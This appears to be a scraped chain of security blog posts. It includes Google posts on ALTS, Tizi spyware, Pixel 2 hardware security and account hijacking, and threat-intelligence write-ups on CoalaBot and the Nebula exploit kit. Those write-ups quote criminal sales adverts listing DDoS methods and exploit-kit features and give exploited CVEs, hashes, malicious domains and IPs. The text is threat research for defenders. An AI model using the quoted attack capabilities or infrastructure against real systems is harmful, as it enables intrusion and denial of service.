information such as passwords, cryptographic key material, etc.In order to improve performance, many CPUs may choose to speculatively execute instructions based on assumptions that are considered likely to be true. During speculative execution, the processor is verifying these assumptions; if they are valid, then the execution continues. If they are invalid, then the execution is unwound, and the correct execution path can be started based on the actual conditions. It is possible for this speculative execution to have side effects which are not restored when the CPU state is unwound, and can lead to information disclosure.There is no single fix for all three attack variants; each requires protection independently. Many vendors have patches available for one or more of these attacks.We will continue our work to mitigate these vulnerabilities and will update both our product support page and this blog post as we release further fixes. More broadly, we appreciate the support and involvement of all the partners and Google engineers who worked tirelessly over the last few months to make our users and customers safe.Blog post update logAdded link to Project Zero blogAdded link to Google Cloud blog

Posted by Cesar Ghali and Julien Boeuf, Engineers on the Security & Privacy TeamAt Google, protection of customer data is a top priority. One way we do this is by protecting data in transit by default. We protect data when it is sent to Google using secure communication protocols such as TLS (Transport Layer Security). Within our infrastructure, we protect service-to-service communications at the application layer using a system called Application Layer Transport Security (ALTS). ALTS authenticates the communication between Google services and helps protect data in transit. Today, we’re releasing a whitepaper, “Application Layer Transport Security,” that goes into detail about what ALTS is, how it protects data, and how it’s implemented at Google.ALTS is a highly reliable, trusted system that provides authentication and security for our internal Remote Procedure Call (RPC) communications. ALTS requires minimal involvement from the services themselves. When services communicate with each other at Google, such as the Gmail frontend communicating with a storage backend system, they do not need to explicitly configure anything to ensure data transmission is protected - it is protected by default. All RPCs issued or received by a production workload that stay within a physical boundary controlled by or on behalf of Google are protected with ALTS by default. This delivers numerous benefits while allowing the system work at scale:More precise security: Each workload has its own identity. This allows workloads running on the same machine to authenticate using their own identity as opposed to the machine’s identity.Improved scalability: ALTS accommodates Google’s massive scale by using an efficient resumption mechanism embedded in the ALTS handshake protocol, allowing services that were already communicating to easily resume communications. ALTS can also accommodate the authentication and encryption needs of a large number of RPCs; for example, services running on Google production systems collectively issue on the order of O(1010) RPCs per second.Reduced overhead: The overhead of potentially expensive cryptographic operations can be reduced by supporting long-lived RPC channels.Multiple features that ensure security and scalabilityInside physical boundaries controlled by or on behalf of Google, all scheduled production workloads are initialized with a certificate that asserts their identity. These credentials are securely delivered to the workloads. When a workload is involved in an ALTS handshake, it verifies the remote peer identity and certificate. To further increase security, all Google certificates have a relatively short lifespan.ALTS has a flexible trust model that works for different types of entities on the network. Entities can be physical machines, containerized workloads, and even human users to whom certificates can be provisioned.ALTS provides a handshake protocol, which is a Diffie-Hellman (DH) based authenticated key exchange protocol that Google developed and implemented. At the end of a handshake, ALTS provides applications with an authenticated remote peer identity, which can be used to enforce fine-grained authorization policies at the application layer.ALTS ensures the integrity of Google traffic is protected, and encrypted as needed.After a handshake is complete and the client and server negotiate the necessary shared secrets, ALTS secures RPC traffic by forcing integrity, and optional encryption, using the negotiated shared secrets. We support multiple protocols for integrity guarantees, e.g., AES-GMAC and AES-VMAC with 128-bit keys. Whenever traffic leaves a physical boundary controlled by or on behalf of Google, e.g., in transit over WAN between datacenters, all protocols are upgraded automatically to provide encryption as well as integrity guarantees. In this case, we use the AES-GCM and AES-VCM protocols with 128-bit keys.More details on how Google data encryption is performed are available in another whitepaper we are releasing today, “Encryption in Transit in Google Cloud.”In summary, ALTS is widely used in Google’s infrastructure to provide service-to-service authentication and integrity, with optional encryption for all Google RPC traffic. For more information about ALTS, please read our whitepaper, “Application Layer Transport Security.”

Posted by Paul Stanton and Brooke Heinichen, Safe Browsing TeamUpdated on 12/14/17 to further distinguish between Unwanted Software Policy and Google Play Developer Program PolicyIn our efforts to protect users and serve developers, the Google Safe Browsing team has expanded enforcement of Google's Unwanted Software Policy to further tamp down on unwanted and harmful mobile behaviors on Android. As part of this expanded enforcement, Google Safe Browsing will show warnings on apps and on websites leading to apps that collect a user’s personal data without their consent.Apps handling personal user data (such as user phone number or email), or device data will be required to prompt users and to provide their own privacy policy in the app. Additionally, if an app collects and transmits personal data unrelated to the functionality of the app then, prior to collection and transmission, the app must prominently highlight how the user data will be used and have the user provide affirmative consent for such use.These data collection requirements apply to all functions of the app. For example, during analytics and crash reportings, the list of installed packages unrelated to the app may not be transmitted from the device without prominent disclosure and affirmative consent.These requirements, under the Unwanted Software Policy, apply to apps in Google Play and non-Play app markets. The Google Play team has also published guidelines for how Play apps should handle user data and provide disclosure.Starting in 60 days, this expanded enforcement of Google’s Unwanted Software Policy may result in warnings shown on user devices via Google Play Protect or on webpages that lead to these apps. Webmasters whose sites show warnings due to distribution of these apps should refer to the Search Console for guidance on remediation and resolution of the warnings. Developers whose apps show warnings should refer to guidance in the Unwanted Software Help Center. Developers can also request an app review using this article on App verification and appeals, which contains guidance applicable to apps in both Google Play and non-Play app stores. Apps published in Google Play have specific criteria to meet under Google Play’s Developer Program Policies; these criteria are outlined in the Play August 2017 announcement.

Posted by Anthony Desnos, Megan Ruthven, and Richard Neal, Google Play Protect security engineers and Clement Lecigne, Threat Analysis GroupGoogle is constantly working to improve our systems that protect users from Potentially Harmful Applications (PHAs). Usually, PHA authors attempt to install their harmful apps on as many devices as possible. However, a few PHA authors spend substantial effort, time, and money to create and install their harmful app on a small number of devices to achieve a certain goal.This blog post covers Tizi, a backdoor family with some rooting capabilities that was used in a targeted attack against devices in African countries, specifically: Kenya, Nigeria, and Tanzania. We'll talk about how the Google Play Protect and Threat Analysis teams worked together to detect and investigate Tizi-infected apps and remove and block them from Android devices.What is Tizi?Tizi is a fully featured backdoor that installs spyware to steal sensitive data from popular social media applications. The Google Play Protect security team discovered this family in September 2017 when device scans found an app with rooting capabilities that exploited old vulnerabilities. The team used this app to find more applications in the Tizi family, the oldest of which is from October 2015. The Tizi app developer also created a website and used social media to encourage more app installs from Google Play and third-party websites.Here is an example social media post promoting a Tizi-infected app:What is the scope of Tizi?What are we doing?To protect Android devices and users, we used Google Play Protect to disable Tizi-infected apps on affected devices and have notified users of all known affected devices. The developers' accounts have been suspended from Play.The Google Play Protect team also used information and signals from the Tizi apps to update Google's on-device security services and the systems that search for PHAs. These enhancements have been enabled for all users of our security services and increases coverage for Google Play users and the rest of the Android ecosystem.Additionally, there is more technical information below to help the security industry in our collective work against PHAs.What do I need to do?Through our investigation, we identified around 1,300 devices affected by Tizi. To reduce the chance of your device being affected by PHAs and other threats, we recommend these 5 basic steps:Check permissions: Be cautious with apps that request unreasonable permissions. For example, a flashlight app shouldn't need access to send SMS messages.Enable a secure lock screen: Pick a PIN, pattern, or password that is easy for you to remember and hard for others to guess.Update your device: Keep your device up-to-date with the latest security patches. Tizi exploited older and publicly known security vulnerabilities, so devices that have up-to-date security patches are less exposed to this kind of attack.Google Play Protect: Ensure Google Play Protect is enabled.Locate your device: Practice finding your device, because you are far more likely to lose your device than install a PHA.How does Tizi work?The Google Play Protect team had previously classified some samples as spyware or backdoor PHAs without connecting them as a family. The early Tizi variants didn't have rooting capabilities or obfuscation, but later variants did.After gaining root, Tizi steals sensitive data from popular social media apps like Facebook, Twitter, WhatsApp, Viber, Skype, LinkedIn, and Telegram. It usually first contacts its command-and-control servers by sending an SMS with the device's GPS coordinates to a specific number. Subsequent command-and-control communications are normally performed over regular HTTPS, though in some specific versions, Tizi uses the MQTT messaging protocol with a custom server. The backdoor contains various capabilities common to commercial spyware, such as recording calls from WhatsApp, Viber, and Skype; sending and receiving SMS messages; and accessing calendar events, call log, contacts, photos, Wi-Fi encryption keys, and a list of all installed apps. Tizi apps can also record ambient audio and take pictures without displaying the image on the device's screen.Tizi can root the device by exploiting one of the following local vulnerabilities:CVE-2012-4220CVE-2013-2596CVE-2013-2597CVE-2013-2595CVE-2013-2094CVE-2013-6282CVE-2014-3153CVE-2015-3636CVE-2015-1805Most of these vulnerabilities target older chipsets, devices, and Android versions. All of the listed vulnerabilities are fixed on devices with a security patch level of April 2016 or later, and most of them were patched considerably prior to this date. Devices with this patch level or later are far less exposed to Tizi's capabilities. If a Tizi app is unable to take control of a device because the vulnerabilities it tries to use are are all patched, it will still attempt to perform some actions through the high level of permissions it asks the user to grant to it, mainly around reading and sending SMS messages and monitoring, redirecting, and preventing outgoing phone calls.Samples uploaded to VirusTotalTo encourage further research in the security community, here are some sample applications embedding Tizi that were already on VirusTotal.Package nameSHA256 digestSHA1 certificatecom.press.nasa.com.tanofresh4d780a6fc18458311250d4d1edc750468fdb9b3e4c950dce5b35d4567b47d4a7816bbee3cab5eed00b8bd16df56032a96e243201com.dailyworkout.tizi7c6af091a7b0f04fb5b212bd3c180ddcc6abf7cd77478fd22595e5b7aa7cfd9f404b4d1a7176e219eaa457b0050b4081c22a9a1acom.system.update.systemupdate7a956c754f003a219ea1d2205de3ef5bc354419985a487254b8aeb865442a55e4d2962ac1f6551435709a5a874595d855b1fa8abAdditional digests linked to TiziTo encourage further research in the security community, here are some sample digests of exploits and utilities that were used or abused by Tizi.FilenameSHA256 digestrun_root_shellf2e45ea50fc71b62d9ea59990ced755636286121437ced6237aff90981388f6aiovyroot4d0887f41d0de2f31459c14e3133debcdf758ad8bbe57128d3bec2c907f2acf3filesbetyangu.tar9869871ed246d5670ebca02bb265a584f998f461db0283103ba58d4a650333be

Posted by Xiaowen Xin, Android Security TeamThe new Google Pixel 2 ships with a dedicated hardware security module designed to be robust against physical attacks. This hardware module performs lockscreen passcode verification and protects your lock screen better than software alone.To learn more about the new protections, let’s first review the role of the lock screen. Enabling a lock screen protects your data, not just against casual thieves, but also against sophisticated attacks. Many Android devices, including all Pixel phones, use your lockscreen passcode to derive the key that is then used to encrypt your data. Before you unlock your phone for the first time after a reboot, an attacker cannot recover the key (and hence your data) without knowing your passcode first. To protect against brute-force guessing your passcode, devices running Android 7.0+ verify your attempts in a secure environment that limits how often you can repeatedly guess. Only when the secure environment has successfully verified your passcode does it reveal a device and user-specific secret used to derive the disk encryption key.Benefits of tamper-resistant hardwareThe goal of these protections is to prevent attackers from decrypting your data without knowing your passcode, but the protections are only as strong as the secure environment that verifies the passcode. Performing these types of security-critical operations in tamper-resistant hardware significantly increases the difficulty of attacking it.Tamper-resistant hardware comes in the form of a discrete chip separate from the System on a Chip (SoC). It includes its own flash, RAM, and other resources inside a single package, so it can fully control its own execution. It can also detect and defend against outside attempts to physically tamper with it.In particular:Because it has its own dedicated RAM, it’s robust against many side-channel information leakage attacks, such as those described in the TruSpy cache side-channel paper.Because it has its own dedicated flash, it’s harder to interfere with its ability to store state persistently.It loads its operating system and software directly from internal ROM and flash, and it controls all updates to it, so attackers can’t directly tamper with its software to inject malicious code.Tamper-resistant hardware is resilient against many physical fault injection techniques including attempts to run outside normal operating conditions, such as wrong voltage, wrong clock speed, or wrong temperature. This is standardized in specifications such as the SmartCard IC Platform Protection Profile, and tamper-resistant hardware is often certified to these standards.Tamper-resistant hardware is usually housed in a package that is resistant to physical penetration and designed to resist side channel attacks, including power analysis, timing analysis, and electromagnetic sniffing, such as described in the SoC it to EM paper.Security module in Pixel 2The new Google Pixel 2 ships with a security module built using tamper-resistant hardware that protects your lock screen and your data against many sophisticated hardware attacks.In addition to all the benefits already mentioned, the security module in Pixel 2 also helps protect you against software-only attacks:Because it performs very few functions, it has a super small attack surface.With passcode verification happening in the security module, even in the event of a full compromise elsewhere, the attacker cannot derive your disk encryption key without compromising the security module first.The security module is designed so that nobody, including Google, can update the passcode verification logic to a weakened version without knowing your passcode first.SummaryJust like many other Google products, such as Chromebooks and Cloud, Android and Pixel are investing in additional hardware protections to make your device more secure. With the new Google Pixel 2, your data is safer against an entire class of sophisticated hardware attacks.

Posted by Kurt Thomas, Anti-Abuse Research; Angelika Moscicki, Account SecurityAccount takeover, or ‘hijacking’, is unfortunately a common problem for users across the web. More than 15% of Internet users have reported experiencing the takeover of an email or social networking account. However, despite its familiarity, there is a dearth of research about the root causes of hijacking.With Google accounts as a case-study, we teamed up with the University of California, Berkeley to better understand how hijackers attempt to take over accounts in the wild. From March 2016 to March 2017, we analyzed several black markets to see how hijackers steal passwords and other sensitive data. We’ve highlighted some important findings from our investigation below. We presented our study at the Conference on Computer and Communications Security (CCS) and it’s now available here.What we learned from the research proved to be immediately useful. We applied its insights to our existing protections and secured 67 million Google accounts before they were abused. We’re sharing this information publicly so that other online services can better secure their users, and can also supplement their authentication systems with more protections beyond just passwords.How hijackers steal passwords on the black marketOur research tracked several black markets that traded third-party password breaches, as well as 25,000 blackhat tools used for phishing and keylogging. In total, these sources helped us identify 788,000 credentials stolen via keyloggers, 12 million credentials stolen via phishing, and 3.3 billion credentials exposed by third-party breaches.While our study focused on Google, these password stealing tactics pose a risk to all account-based online services. In the case of third-party data breaches, 12% of the exposed records included a Gmail address serving as a username and a password; of those passwords, 7% were valid due to reuse. When it comes to phishing and keyloggers, attackers frequently target Google accounts to varying success: 12-25% of attacks yield a valid password.However, because a password alone is rarely sufficient for gaining access to a Google account, increasingly sophisticated attackers also try to collect sensitive data that we may request when verifying an account holder’s identity. We found 82% of blackhat phishing tools and 74% of keyloggers attempted to collect a user’s IP address and location, while another 18% of tools collected phone numbers and device make and model.By ranking the relative risk to users, we found that phishing posed the greatest threat, followed by keyloggers, and finally third-party breaches.Protecting our users from account takeoverOur findings were clear: enterprising hijackers are constantly searching for, and are able to find, billions of different platforms’ usernames and passwords on black markets. While we have already applied these insights to our existing protections, our findings are yet another reminder that we must continuously evolve our defenses in order to stay ahead of these bad actors and keep users safe.For many years, we’ve applied a ‘defense in-depth’ approach to security—a layered series of constantly improving protections that automatically prevent, detect, and mitigate threats to keep your account safe.PreventionA wide variety of safeguards help us to prevent attacks before they ever affect our users. For example, Safe Browsing, which now protects more than 3 billion devices, alerts users before they visit a dangerous site or when they click a link to a dangerous site within Gmail. We recently announced the Advanced Protection program which provides extra security for users that are at elevated risk of attack.DetectionWe monitor every login attempt to your account for suspicious activity. When there is a sign-in attempt from a device you’ve never used, or a location you don’t commonly access your account from, we’ll require additional information before granting access to your account. For example, if you sign in from a new laptop and you have a phone associated with you account, you will see a prompt—we’re calling these dynamic verification challenges—like this:This challenge provides two-factor authentication on all suspicious logins, while mitigating the risk of account lockout.MitigationFinally, we regularly scan activity across Google’s suite of products for suspicious actions performed by hijackers and when we find any, we lock down the affected accounts to prevent any further damage as quickly as possible. We prevent or undo actions we attribute to account takeover, notify the affected user, and help them change their password and re-secure their account into a healthy state.What you can doThere are some simple steps you can take that make these defenses even stronger. Visit our Security Checkup to make sure you have recovery information associated with your account, like a phone number. Allow Chrome to automatically generate passwords for your accounts and save them via Smart Lock. We’re constantly working to improve these tools, and our automatic protections, to keep your data safe.

CoalaBot appears to be build on August Stealer code (Panel and Traffic are really alike)I found it spread as a tasks in a Betabot and in an Andromeda spread via RIG fed by at least one HilltopAds malvertising. 2017-09-11: a witnessed infection chain to CoalaBotA look inside :CoalaBot: Login Screen(August Stealer alike) CoalaBot: StatisticsCoalaBot: BotsCoalaBot: TasksCoalaBot: TasksCoalaBot: New Taks (list)CoalaBot: https get task detailsCoalaBot: http post task detailsCoalaBot: SettingsHere is the translated associated advert published on 2017-08-23 by a user going with nick : Discomrade.(Thanks to Andrew Komarov and others who provided help here).------------------------------------------Coala Http Ddos Bot The software focuses on L7 attacks (HTTP). Lower levels have more primitive attacks.Attack types:• ICMP (PING) FLOOD• UDP FLOOD• TCP FLOOD• HTTP ARME• HTTP GET *• HTTP POST *• HTTP SLOWLORIS *• HTTP PULSE WAVE ** - Supports SMART mode, i.e. bypasses Cloudflare/Blazingfast and similar services (but doesn’t bypass CAPTCHA). All types except ICMP/UDP have support for using SSL.Binary:• .NET 2.0 x86 (100% working capacity WIN XP - WIN 7, on later versions ОС .NET 2.0 disabled by default)• ~100kb after obfuscation• Auto Backup (optional)• Low CPU load for efficient use• Encryption of incoming/outgoing traffic• No installation on machines from former CIS countries(RU/UA/BL/KZ/...)• Scan time non-FUD. Contact us if you need a recommendation for a good crypting service.• Ability to link a build to more than one gate.Panel:• Detailed statistics on time online/architecture/etc. • List of bots, detailed information• Number count of requests per second (total/for each bot)• Creation of groups for attacks• Auto sorting of bots by groups • Creation of tasks, the ability to choose by group/country• Setting an optional time for bots success rate Other:• Providing macros for randomization of sent data • Support of .onion gate• Ability to install an additional layer (BOT => LAYER => MAIN GATE) Requirements:• PHP 5.6 or higher• MySQL• Мodule for MySQLi(mysqli_nd); php-mbstring, php-json, php-mcrypt extensionsScreenshots:• Statistics- http://i.imgur.com/FUevsaS.jpg• Bots - http://i.imgur.com/nDwl9pY.jpg• Created tasks - http://i.imgur.com/RltiDhl.png• Task List - http://i.imgur.com/tqEEpX0.jpg• Settings - http://i.imgur.com/EbhExjE.jpgPrice:• $300 - build and panel. Up to 3 gates for one build.• $20 - rebuildThe price can vary depending on updates.Escrow service is welcome.Help with installation is no charge.------------------------------------------Sample:VT linkMD5 f3862c311c67cb027a06d4272b680a3bSHA1 0ff1584eec4fc5c72439d94e8cee922703c44049SHA256 fd07ad13dbf9da3f7841bc0dbfd303dc18153ad36259d9c6db127b49fa01d08fEmerging Threats rules :2024531 || ET TROJAN MSIL/CoalaBot CnC ActivityRead More:August in November: New Information Stealer Hits the Scene - 2016-12-07 - Proofpoint

Nebula LogoWhile Empire (RIG-E) disappeared at the end of December after 4 months of activityIllustration of  the last month of witnessed Activity for Empireon 2017-02-17 an advert for a new exploit kit dubbed Nebula appeared underground.------Selling EK Nebula------Nebula Exploit kitFeatures:-Automatic domain scanning and generating (99% FUD)-API rotator domains-Exploit rate tested in different traffic go up 8/19%-knock rate tested whit popular botnet go 30/70%-Clean and modern user interface-Custom domains & server ( add & point your own domains coming soon...)-Unlimited flows & files-Scan file & domains-Multiple payload file types supported (exe , dll , js, vbs)-Multi. geo flow (split loads by country & file)-Remote file support ( check every 1 minute if file hash change ; if changed replace ) for automatic crypting-Public stats by file & flow-latest CVE-2016 CVE-2017-custom features just ask supportSubscriptions:24h - 100$7d - 600$31d - 2000$Jabber - nebula-support@xmpp.jpOffering free tests to trusted users ------In same thread some screenshots were shared by a customer.Earlier that same day, colleagues at Trendmicro told me they were seeing activity from a group we are following under the name "GamiNook" (illustration coming later) in Japan redirecting traffic to a variation of Sundown."GamiNook" redirecting to a Sundown Variation in Japan - 2017-02-17Payload : Pitou (6f9d71eebe319468927f74b93c820ce4 ) This Sundown variation was not so much different from the mainstream one.No "index.php?" in the landing URI, different domain pattern but same landing, exploits, etc... Some payload sent in clear (01.php) other RC4 encoded (00.php) as for Sundown.Digging more it appeared it was featuring an Internal TDS (as Empire). The same exact call would give you a different payload in France or in United Kingdom/Japan."GamiNook" traffic with geo in France - 2017-02-17Identicall payload call gives you Gootkit instead of PitouPayload : Gootkit (48ae9a5d10085e5f6a1221cd1eedade6)Note: to be sure that the payload difference is tied to Geo and not time based (rotation or operator changing it ) you need to make at least a third pass with first Geo and ensure dropped sample is identical as in first pass.At that point you can only suspect this Sundown variant might be Nebula (even if clues are multiple, a funny one being that the traffic illustrated in the advert thread is quite inline with the one captured in France).So I was naming that variation: Sundown-N. Intel shared by Frank Ruiz (FoxIT) on the 21st allowed me to know for sure this traffic was indeed Nebula.The following days i saw other actor sending traffic to this EK.Taxonomy tied to Nebula Activity in MISP - 2017-03-02Taxonomy tied to GamiNook traffic activity, EK and resulting payloadToday URI pattern changed from this morning :/?yWnuAH-XgstCZ3E=tCi6ZGr10KUDHiaOgKVNolmBgpc3rkRp-weok1A2JV-gkpS0luBwQDdM/?yXy3HX2F=tCu_Mj322aEBSXjYhatLoVmBgZJh_0Fg_wX_zQYxIg6nksDowOciFzNB/?yXzbGV2jkcB_eU8=4ya6MDz31KdQTi7ahapLolnWjJdj_EJt-VT4mwQxIQ6gksTllrB3EGRM/?ykjaKniEk6ZhH1-P=si-8YGj_1aANTynfh6Ye81mHhZE0_RNs_gn5nAExcV6okpTknOQgEmNN/?z0vDa0iBu-Q=tHnqNT_-1KcGGCzfhqVKoVmB08dm_BJt-QKumQEwJA2nksGyk-QhQDRA/?z13qMVqqoKRvTw=5S--Y2uk0apQGiyOhvdI81nQhZMwqxVo9FSsmVAyIgiokpPnl-V0QDIf/?z1fECTiT=sy7tYmz206FUGCvagKpK9VmGhMAxrxZq_1CungQwdF71ksDowOciFzNB/?zVnra0OCs9k=syjqMjel06ADFHuP0qNKolmGgsdh9BZq_geizlFkcQ2gksTllrB3EGRM/?zVnra0OCs9k=syjqMjel06ADFHuP0qNKolmGgsdh9BZq_geizlFkcQ2gksW2w7QsRTIf/?zWnBFniM=4Ca9Zjej0PRTGC3e06FJp1nVjJA1rBRpqleumABkJF2hksTllrB3EGRM/?zn3iKU_xjeNxWw=sHu7MTry2aoAFCyKgKUY8FmF0ZZi_kFg9ASimVQ2cl-lksTllrB3EGRM/?zy3jN0Gvi9RjY02F2g=4H27Yjn-0_EBHSrc26MfoVnV15Yx-hJqrwWrnwJjcVqnkpTknOQgEmNN(which is Sundown/Beps without the index.php) to/86fb7c1b/showpost.php?s=af75b6af5d0f08cf675149da13b1d3e4&p=13&postcount=8/641222267738845/thumb/6456dac5bc39ec7/comment_post.php?ice=bDaE06lCQU/507728217866857/9ecc534d/bug_report/media/pr.php?id=b38cb0526f8cd52d878009d9f27be8f4/gu/Strategy/qNXL8WmQ6G/rss.php?cat=MSFT/moddata/a9/showpost.php?s=0d2d722e1a2a625b3ceb042daf966593&p=13&postcount=1/2003/01/27/exchange-monday-wilderness/46198923243328031687/applications/blockStyle.php?last-name=6419f08706689953783a59fa4faeb75c/5wtYymZeVy/LKYcSFhKOi/showpost.php?s=2e3e8a3c3b6b00cd3033f8e20d174bf5&p=8&postcount=7/2006/08/05/fur-copper-shark/48396170957391254103/XD25OYwON1/showpost.php?s=abf72cd40a08463fad0b3d153da66cae&p=27&postcount=7/tV9FnNwo4h/b303debe9a6305791b9cd16b1f10b91e/promotion.php?catid=h/ef131fb2025525a/QLGWEFwfdh/550991586389812/core.write_file.php?lawyer=9H6UhvusOi/aPKr0Oe5GV/23861001482170285181/showpost.php?s=e74b32ba071772d5b55f97159db2e998&p=2&postcount=1/2/eb799e65a412b412ee63150944c7826d61cd7a544f7aa57029a9069698b4925b2068ed77dea8dc6210b933e3ecf1f35b/showthread.php?t=18024&page=14/js/archives/3f635a090e73f9b/showthread.php?t=6636&page=18/59cdf39001a623620bd7976a42dde55f190382060a264e21809fc51f/ff0a503d59ddb4d5e1fb663b6475dfe0ba08f0b84ce8692d/viewtopic.php?f=84&t=48361/615147354246727/339824645925013/nqHgct4sEE/showthread.php?t=51299&page=20/2012/04/22/present-measure-physical-examination(for those who would like to build their regexp, more pattern available here : https://raw.githubusercontent.com/Kafeine/public/master/Nebula_URI )2017-03-02 Nebula with its new pattern used here to drop Ramnit via Malvertising in NA - 2017-03-02This landing pattern change triggered the publication of this post. Nebula might end up not being a "vapor" EK but let's wait and see. The only difference with Sundown till today was its internal TDS.Exploits: CVE-2014-6332 + CVE-2015-0016CVE-2013-2551CVE-2016-0189 godmodeCVE-2015-8651CVE-2015-7645CVE-2016-4117Files:  Nebula_2017-03-02 (2 fiddler - password is malware)Acknowledgement :Thanks Joseph C Chen and Brooks Li (Trendmicro),  Frank Ruiz (Fox-IT InTELL) and Andrew Komarov ( InfoArmor Inc. ) for the help on different aspect of this post.Edit:2017-03-03 Corrected some CVE id + not all payload are in clear---Some IOCsDateSha256Comment2017/02/17f4627005c018071f8ec6b084eef3936e3a267660b0df99ffa0d27a8d943d1af5Flash Exploit (CVE-2016-4117)2017/02/27be86dc88e6337f09999991c206f890e0d52959d41f2bb4c6515b5442b23f2eccFlash Exploit (CVE-2016-4117)2017/02/1767d598c6acbd6545ab24bbd44cedcb825657746923f47473dc40d0d1f122abb6Flash Exploit (CVE-2015-7645 Sample seen previously in Sundown)2017/02/1704fb00bdd3d2c0667b18402323fe7cf495ace5e35a4562e1a30e14b26384f41cFlash Exploit (CVE-2015-8651 Sample seen previously in Sundown)2017/02/17b976cf6fd583b349e51cb34b73de6ef3a5ee72f86849f847b9158b4a7fb2315cPitou2017/02/176fe13d913f4d3f2286f67fbde08ab17418ba8370410e52354ffa12a0aaf498f8Gootkit2017/02/221a22211d01d2e8746efe0d14ab7e1e547c3e30863a83e0884a9d90325bd7b64bRamnit2017/03/026764f98ba6509b3351ad2f960dcc47c27d0dc00d53d7e0ae132a7c1d15067f4aDiamondFoxDateDomainIPComment2017/02/17tci.nhnph.com188.209.49.135Nebula Payload Domain2017/02/22gnd.lplwp.com188.209.49.135Nebula Payload Domain2017/02/24qcl.ylk8.xyz188.209.49.23Nebula Payload Domain2017/02/28hmn.losssubwayquilt.pw93.190.141.166Nebula Payload Domain2017/03/02qgg.losssubwayquilt.pw93.190.141.166Nebula Payload Domain2017/02/17agendawedge.shoemakerzippersuccess.stream188.209.49.135Nebula2017/02/17clausmessage.nationweekretailer.club217.23.7.15Nebula2017/02/17equipmentparticle.shockadvantagewilderness.club217.23.7.15Nebula2017/02/17salaryfang.shockadvantagewilderness.club217.23.7.15Nebula2017/02/22deficitshoulder.lossicedeficit.pw188.209.49.135Nebula2017/02/22distributionjaw.hockeyopiniondust.club188.209.49.135Nebula2017/02/22explanationlier.asiadeliveryarmenian.pro188.209.49.135Nebula2017/02/23cowchange.distributionstatementdiploma.site188.209.49.151Nebula2017/02/23instructionscomposition.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/23paymentceramic.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/23soldierprice.distributionstatementdiploma.site188.209.49.135Nebula2017/02/23swissfacilities.gumimprovementitalian.stream188.209.49.135Nebula2017/02/23transportdrill.facilitiesturkishdipstick.info188.209.49.135Nebula2017/02/24authorisationmessage.casdfble.stream188.209.49.151Nebula2017/02/24cowchange.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24departmentant.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24disadvantageproduction.brassreductionquill.site188.209.49.151Nebula2017/02/24disadvantageproduction.casdfble.stream188.209.49.151Nebula2017/02/24europin.pedestrianpathexplanation.info188.209.49.151Nebula2017/02/24hygienicreduction.brassreductionquill.site188.209.49.151Nebula2017/02/24hygienicreduction.casdfble.stream188.209.49.151Nebula2017/02/24instructionscomposition.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24jobhate.pedestrianpathexplanation.info188.209.49.151Nebula2017/02/24limitsphere.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24paymentceramic.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24penaltyinternet.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/24phonefall.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/24printeroutput.pheasantmillisecondenvironment.stream188.209.49.151Nebula2017/02/24redrepairs.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24soldierprice.distributionstatementdiploma.site188.209.49.151Nebula2017/02/24suggestionburn.distributionstatementdiploma.site188.209.49.151Nebula2017/02/25advertiselaura.bubblecomparisonwar.top188.209.49.49Nebula2017/02/25apologycattle.gramsunshinesupply.club188.209.49.151Nebula2017/02/25apologycattle.gramsunshinesupply.club188.209.49.49Nebula2017/02/25apologycattle.gramsunshinesupply.club93.190.141.39Nebula2017/02/25apologycold.shearssuccessberry.club188.209.49.151Nebula2017/02/25authorizationmale.foundationspadeinventory.club188.209.49.151Nebula2017/02/25birthdayexperience.foundationspadeinventory.club188.209.49.151Nebula2017/02/25confirmationaustralian.retaileraugustplier.club188.209.49.151Nebula2017/02/25dancerretailer.shearssuccessberry.club188.209.49.151Nebula2017/02/25employergoods.deliverycutadvantage.info188.209.49.151Nebula2017/02/25fallhippopotamus.deliverycutadvantage.info188.209.49.151Nebula2017/02/25goallicense.shearssuccessberry.club188.209.49.151Nebula2017/02/25goalpanda.retaileraugustplier.club188.209.49.151Nebula2017/02/25holidayagenda.retaileraugustplier.club188.209.49.151Nebula2017/02/25marketsunday.deliverycutadvantage.info188.209.49.151Nebula2017/02/25penaltyinternet.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/25phonefall.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/25purposeguarantee.shearssuccessberry.club188.209.49.151Nebula2017/02/25rainstormpromotion.gramsunshinesupply.club188.209.49.151Nebula2017/02/25rainstormpromotion.gramsunshinesupply.club188.209.49.49Nebula2017/02/25rainstormpromotion.gramsunshinesupply.club93.190.141.39Nebula2017/02/25rollinterest.asiadeliveryarmenian.pro188.209.49.151Nebula2017/02/25startguarantee.gramsunshinesupply.club188.209.49.151Nebula2017/02/25startguarantee.gramsunshinesupply.club188.209.49.49Nebula2017/02/26advantagelamp.numberdeficitc-clamp.site93.190.141.39Nebula2017/02/26apologycattle.gramsunshinesupply.club93.190.141.39Nebula2017/02/26budgetdegree.maskobjectivebiplane.trade93.190.141.200Nebula2017/02/26competitionseason.numberdeficitc-clamp.site93.190.141.39Nebula2017/02/26customergazelle.cyclonesoybeanpossibility.bid93.190.141.39Nebula2017/02/26decembercommission.divingfuelsalary.trade93.190.141.200Nebula2017/02/26distributionfile.edgetaxprice.site93.190.141.45Nebula2017/02/26equipmentwitness.maskobjectivebiplane.trade93.190.141.200Nebula2017/02/26invoiceburst.cyclonesoybeanpossibility.bid93.190.141.39Nebula2017/02/26invoicegosling.edgetaxprice.site93.190.141.45Nebula2017/02/26jailreduction.edgetaxprice.site93.190.141.45Nebula2017/02/26rainstormpromotion.gramsunshinesupply.club93.190.141.39Nebula2017/02/26startguarantee.gramsunshinesupply.club93.190.141.39Nebula2017/02/27afforddrill.xzv4rzuctndfo.club93.190.141.45Nebula2017/02/27approveriver.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/27burglarsatin.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/27distributionfile.edgetaxprice.site93.190.141.45Nebula2017/02/27invoicegosling.edgetaxprice.site93.190.141.45Nebula2017/02/27jailreduction.edgetaxprice.site93.190.141.45Nebula2017/02/27lipprice.edgetaxprice.site93.190.141.45N